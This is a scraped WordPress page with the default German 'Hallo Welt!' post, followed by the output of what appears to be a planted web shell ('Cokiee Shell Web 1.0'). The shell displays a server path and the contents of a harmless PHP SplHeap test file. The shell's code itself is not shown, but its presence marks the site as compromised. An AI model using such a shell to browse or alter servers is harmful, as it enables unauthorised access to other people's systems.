Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/spl/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/spl/tests/heap_003.phpt |
--TEST-- SPL: SplHeap: comparison callback --FILE-- <?php class myHeap extends SplHeap { public function compare($a, $b) { if ($a > $b) { $result = 1; } else if ($a < $b) { $result = -1; } else { $result = 0; } return $result; } } $h = new myHeap; $in = range(0,10); shuffle($in); foreach ($in as $i) { $h->insert($i); } foreach ($h as $out) { echo $out."\n"; } ?> ===DONE=== <?php exit(0); ?> --EXPECTF-- 10 9 8 7 6 5 4 3 2 1 0 ===DONE===
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare